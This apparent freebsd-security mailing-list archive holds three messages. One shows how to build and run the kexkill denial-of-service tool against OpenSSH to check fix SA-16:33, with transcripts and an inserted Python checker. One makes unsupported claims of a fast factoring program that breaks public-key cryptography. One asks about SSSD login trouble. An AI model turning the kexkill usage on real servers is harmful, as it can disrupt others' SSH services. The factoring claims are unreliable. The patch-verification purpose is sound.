From: Dag-Erling Smørgrav
To: Xin LI
Cc: Vladimir Terziev, Gregory Orange
Subject: Re: FreeBSD Security Advisory FreeBSD-SA-16:33.openssh
Date: Sun, 06 Nov 2016 15:59:38 +0100

Xin LI writes:
> We will investigate if the statement is true and will issue patches
> for earlier FreeBSD releases, if they are confirmed to be affected.

Hoping to make your life a little easier:

$ git clone https://github.com/dag-erling/kexkill
$ cd kexkill
$ ./autogen.sh && ./configure && make

vulnerable 12.0 system:

$ ./src/kexkill -v -n1 target |& grep -v "sending kexinit"
kexkill: [03] connected
kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310
kexkill: [03] sending banner
kexkill: [03] received kexinit
[no more output]
^C

same system after applying SA-16:33:

$ ./src/kexkill -v -n1 target |& grep -v "sending kexinit"
kexkill: [03] connected
kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310
kexkill: [03] sending banner
kexkill: [03] received kexinit
kexkill: [03] read(): Connection reset by peer
kexkill: [03] connected
kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310
kexkill: [03] sending banner
kexkill: [03] received kexinit
kexkill: [03] write(): Broken pipe
kexkill: [03] connected
kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310
kexkill: [03] sending banner
kexkill: [03] received kexinit
kexkill: [03] read(): Connection reset by peer
[...]
^C

Remove -n1 to actually (attempt to) attack the system rather than just probe it.

DES
--
Dag-Erling Smørgrav - des@des.no

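An added example, not part of the original message or of kexkill: a small Python classifier for the two `kexkill -v -n1` transcripts shown in the message above, so the before/after check for SA-16:33 can be scripted. The function name and the verdict labels (`held-open`, `dropped`, `inconclusive`) are assumptions made for this illustration.

```python
import re

# Line shape taken from the transcripts in the message: "kexkill: [03] <event>".
LINE = re.compile(r"^kexkill: \[(\d+)\] (.+)$")

def classify(transcript):
    """Classify a `kexkill -v -n1` capture as 'held-open', 'dropped' or 'inconclusive'."""
    state = {}    # connection id -> state of its current session
    dropped = 0   # sessions that ended in a read()/write() error after KEXINIT
    for raw in transcript.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue  # shell prompts, "^C", "[no more output]", blank lines
        conn, event = m.groups()
        if event == "connected":
            state[conn] = "connected"
        elif event == "received kexinit":
            state[conn] = "kex"
        elif event.startswith(("read():", "write():")):
            # An error before any KEXINIT (e.g. refused) says nothing about the fix.
            if state.get(conn) == "kex":
                dropped += 1
            state[conn] = "closed"
        # banners and "sending kexinit" lines carry no verdict and are ignored
    if dropped:
        return "dropped"        # matches the transcript taken after SA-16:33
    if "kex" in state.values():
        return "held-open"      # matches the transcript from the vulnerable system
    return "inconclusive"

# The two transcripts below are copied from the message (second one shortened).
BEFORE = """\
kexkill: [03] connected
kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310
kexkill: [03] sending banner
kexkill: [03] received kexinit
"""
AFTER = BEFORE + """\
kexkill: [03] read(): Connection reset by peer
kexkill: [03] connected
kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310
kexkill: [03] sending banner
kexkill: [03] received kexinit
kexkill: [03] write(): Broken pipe
"""

if __name__ == "__main__":
    for name, text in (("before", BEFORE), ("after", AFTER)):
        print(name, classify(text))
```

A capture interrupted right after the first "received kexinit" also classifies as `held-open`, so let the probe run for a while before stopping it.
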
From: Jules Gilbert
Reply-To: Jules Gilbert
To: Freebsd-security
Subject: Fw: a factoring program I've decided to give away
Date: Mon, 7 Nov 2016 14:51:50 +0000 (UTC)

----- Forwarded Message -----
From: Jules Gilbert
To: Paul
Sent: Monday, November 7, 2016 9:43 AM
Subject: a factoring program I've decided to give away

Hello Paul.

I should mention, consistent with my purpose in writing (to effect simultaneous distribution of a program I wrote,) several friends of mine are BCC'ed.

I would like to give away, using your website forum as a base, a program I wrote maybe five years ago. The program is a fast-factoring engine. See the attachment, I'm giving you a copy.
I seek to give it to thousands of cryptologic programmers and analysts as simultaneously as possible, it's written in C, does not make use of methods based on primes, but instead employs what I believe is a completely different method to factor numbers, presumably the product of two large primes.

My purpose is to encourage further research in this area and also to cause the people who make the big decisions to consider moving away from privacy tools based on factoring and public/private keys. Why?, this simple program localizes the smaller of the two primes used to set up an instance of encryption. And look how simple it is!, it's really just the junior program, the 'senior' program does much better. (As you will see it's based on functions like the 'ratio' tool included here.)

About the size of the numbers, today I use a tool that converts bignum references to 'BSD bignum code, but when I wrote this I used MAPM.

Probably the most important thing I can say to describe it, is that it isn't the kind of tool one might use to, say, break down the security of a bank's files. Yes it can factor any pair of large integers, but it's not written to be the tool of a criminal, rather a tool to aid number research, particularly with regard to factoring related research.

Given: c = a*b, where a,b,c, are large positive integers.

And, given only 'c', it finds 'a'. By convention (my convention,) 'a' is the smaller factor.

The program proves the method by building a thousand example pairs of (a,b) and then, using only the 'c' value, locates 'a'. It takes, depending on the speed of one's computer, from a few hours to maybe just half an hour to do all thousand problems. The thousand pairs of large numbers are assembled using random numbers. Looking at the code you'll see all this, it's pretty obvious.

But read this next section!

If we use c = a*b, then 'a' must be within the range of 3 ..
sqrt(c), it can not be outside this range -- not if we're talking about positive integers.

My program divides this range into 1,024 sub-sections and identifies which 32 sections the 'a' value is closest to. Assuming we're using the values 'lo' and 'hi' which represent the total range, then knowing the approximate location of 'a', the program can be used to respecify 'lo' and 'hi', reflecting this smaller space and re-applied to further localize the exact value of 'a'.

Though I'd like to say my program is doing a true binary decomposition -- something that many researchers have been attempting, no -- my program isn't quite that.

When the number of sub-sections is 1,024 and the program resolves 'a' to one of 32 sub-sections, that's a five bit gain. True, five bits isn't much when compared to the thousands of bits that is typical for 'c'. Which is why re-application is so important.

Originally I wrote code to do backup when necessary; When the program makes a wrong choice the process quickly fails, and the program backs up several steps (originally the default back-step value was set to five,) and then retries making the alternative choice five steps back. Because I'm trying to avoid empowering criminals and similar types, I've cut that logic out from what I'm giving away.

And second, also to deter bad guys, I include only one "left-right deciding" method. These are the lowest level routines that are the basis of program operation. Originally I used GAC, one of Spear's genetic tools (which btw, are pretty cool, and very easy to use!, too.) The method provided works but isn't the best one. (eg., I don't think a "best" one exists, this is a probabilistic problem.) What's really best is to use several and vote the answers, to go left or right. The 'ratio' model I supply is simple and sufficient for others to learn from.

The program core makes use of a very simple left-right decider, which takes advantage of the differing limits of two sums, each sum derived by summing the results of modulus taking arithmetic. I don't know if this property is known to others, (as I discuss above,) I discovered it using mechanical search techniques.

So why am I publishing this at all, and why now? First, my work relating to prediction has taken a turn that I want to pursue. (And ah, my health isn't so good -- I do what I'm supposed to, but I'm still declining.)

But second, the more I learn about number theory and some related topics, the more I fear the NSA made a mistake forty years ago by focusing most American cryptography on factoring and public-key methods. Why was this such an awful mistake?, because science always moves forward, and what was impossibly hard forty years ago is today millions of times easier. (eg., more feasible.)

The NSA website encourages researchers to publish, to bring forward their ideas, to tell others. I contacted them privately two years ago, and then again, perhaps a year ago, at the time American police stations were getting hit by the Russian mob and I wanted to help the NSA to stop this. Each time I offered my consulting service, each time no one thought enough of my offer to reply. Okay -- though when I had my career and applied for work I always, without fail, always, either got the work or at least a nice letter in reply. Apparently the NSA has different standards... (From what the news reports are saying they prefer people such as Snowden and now, Martin.)

Anyway, I have something else I'm working on but since my health isn't so good and since I fear we (our nation,) is headed into worse problems, maybe I can at least improve our cryptologic health by encouraging America's IT managers to move away from methods that more and more seem to be weak and suspect. Yes I mean methods based on factoring.

For me to post the program you will need to give me my account name and password, I've forgotten them. Sorry.

The program is attached.

From: Ronny Forberger
Reply-To: Ronny Forberger
To: freebsd-security@freebsd.org
Subject: I have no name prompt and no passwords recognized
Date: Sat, 12 Nov 2016 18:07:21 +0100 (CET)

Hi,

I am using SSSD and FreeBSD to authenticate against samba4. I used this howto setting all up: http://serverfault.com/questions/599200/how-to-integrate-active-directory-with-freebsd-10-0-using-security-sssd

But when I want to logon using password, i.e. via dovecot I get wrong password. Neither can I use sudo typing the correct samba4 password.

Also I get a prompt [I have no name!@HOSTNAME] and my files, which I chowned & chgrped to the samba user and group only show IDs as owner.

Any ideas how to solve this? Can this maybe be a permission problem with some file for sssd / NSS which an unprivileged user cannot read?

Best regards,
Ronny Forberger
___________________________________
Ronny Forberger
ronnyforberger at ronnyforberger.de
PGP: http://www.ronnyforberger.de/pgp/email-encryption.html